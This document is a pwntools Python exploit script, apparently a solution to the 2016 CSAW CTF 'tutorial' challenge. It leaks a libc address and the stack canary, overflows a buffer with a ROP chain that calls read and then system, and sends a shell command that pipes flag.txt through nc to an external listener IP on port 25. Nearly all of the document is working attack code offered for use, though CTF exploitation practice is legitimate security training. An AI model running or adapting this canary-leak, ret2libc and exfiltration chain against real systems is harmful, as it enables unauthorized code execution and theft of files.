

2016 CSAW CTF tutorial exploit only

from pwn import *


#nc pwn.chal.csaw.io 8002


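# Target service (original note: nc pwn.chal.csaw.io 8002).
HOST = 'pwn.chal.csaw.io'
PORT = 8002

# Where the *target* should push the flag: `cmd` below runs on the box and
# pipes flag.txt into nc towards this host/port, so a listener (e.g.
# `nc -lvp 25`) must already be up there and reachable from the target.
LISTENER_HOST = '168.188.123.213'
LISTENER_PORT = 25

# Distance from the "Reference" address the service leaks to puts in libc.
# The original used the literal 1280 (= 0x500); re-derive it if the binary
# or the remote libc ever changes.
REFERENCE_TO_PUTS = 0x500

# libc symbol offsets. These belong to one specific libc build; a different
# libc on the target makes system_addr wrong and the chain simply crashes.
PUTS_OFFSET = 0x000000000006FD60
SYSTEM_OFFSET = 0x0000000000046590

# Binary-side addresses (fixed, the binary is evidently not PIE).
READ_PLT = 0x0000000000400B60
WRITE_PLT = 0x0000000000400AE0   # not used by the chain; kept for reference (was misspelt `wrtie_plt`)
POP_RDI_RET = 0x004012e3         # pop rdi ; ret
POP_RSI_R15_RET = 0x004012e1     # pop rsi ; pop r15 ; ret
BSS = 0x00000000006020F8         # writable scratch area for the command string

# Bytes between the start of the overflowed buffer and the stack canary.
BUF_SIZE = 312

# fd the ROP chain reads the command from. 4 is assumed to be the client
# socket inside the per-connection handler -- TODO confirm against the binary.
SOCKET_FD = 4


def leak_puts(conn):
    """Menu option 1: resolve puts@libc from the "Reference" address the service prints.

    Returns the absolute address of puts in the remote libc.
    """
    conn.sendline(b"1")
    print(conn.recvuntil(b">Reference:0x"))
    # recvn blocks until exactly 12 hex digits have arrived; the original
    # recv(12) could return a short read and silently parse a truncated value.
    reference = int(conn.recvn(12), 16)
    puts_addr = reference + REFERENCE_TO_PUTS
    print("puts_addr : " + hex(puts_addr))
    return puts_addr


def leak_canary(conn):
    """Menu option 2: fill the buffer so the service's echo runs into the canary.

    Sends exactly BUF_SIZE bytes ending in the marker "Z\\n", waits for the
    echo of that marker and takes the next 8 echoed bytes as the canary.
    Returns the canary as an int.
    """
    conn.sendline(b"2")
    # 310 x 'A' + 'Z' + '\n' == BUF_SIZE bytes, i.e. the buffer is filled
    # up to (but not including) the canary.
    conn.send(b"A" * (BUF_SIZE - 2) + b"Z\n")
    print(conn.recvuntil(b"Z\n"))
    canary = u64(conn.recvn(8))
    print("canary : " + hex(canary))
    # glibc's x86-64 stack canary normally has a 0x00 low byte; anything
    # else usually means the leak offset is off and the chain will not run.
    if canary & 0xff != 0:
        log.warn("canary low byte is not 0x00 -- leak may be misaligned")
    return canary


def build_rop_chain(canary, system_addr):
    """Build the second-stage payload: overflow + canary + saved rbp + ROP chain.

    Chain: read(SOCKET_FD, BSS, rdx) pulls the shell command from the socket
    into .bss, then system(BSS) executes it.  rdx is never set by the chain,
    so it relies on whatever the preceding read() left there being at least
    as large as the command -- TODO confirm on the binary.
    Returns the payload bytes, without a trailing newline.
    """
    payload = b"A" * BUF_SIZE
    payload += p64(canary)                                   # keep the canary check happy
    payload += b"B" * 8                                      # saved rbp, any value works
    payload += p64(POP_RDI_RET) + p64(SOCKET_FD)             # rdi = fd
    payload += p64(POP_RSI_R15_RET) + p64(BSS) + b"A" * 8    # rsi = buf, r15 = junk
    payload += p64(READ_PLT)                                 # read(fd, BSS, rdx)
    payload += p64(POP_RDI_RET) + p64(BSS)                   # rdi = command string
    payload += p64(system_addr)                              # system(BSS)
    payload += b"C" * 8                                      # never reached
    return payload


def main():
    """Run the exploit end to end against HOST:PORT."""
    cmd = "cat flag.txt | nc %s %d;" % (LISTENER_HOST, LISTENER_PORT)
    conn = remote(HOST, PORT)
    try:
        puts_addr = leak_puts(conn)
        canary = leak_canary(conn)

        libc_base = puts_addr - PUTS_OFFSET
        system_addr = libc_base + SYSTEM_OFFSET
        log.info("system_addr : " + hex(system_addr))

        conn.sendline(b"2")
        conn.sendline(build_rop_chain(canary, system_addr))

        # Give the handler time to return into the chain and block in read()
        # before the command arrives; the original author found a short pause
        # necessary -- keep it unless tested otherwise.
        sleep(0.3)
        conn.sendline(cmd.encode())

        # Whatever the service still prints; the flag itself arrives at the
        # listener, not here. The original issued six blind recv(1024) calls,
        # which raise EOFError as soon as the server closes the socket.
        print(conn.recvrepeat(2))
    finally:
        conn.close()


if __name__ == "__main__":
    main()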


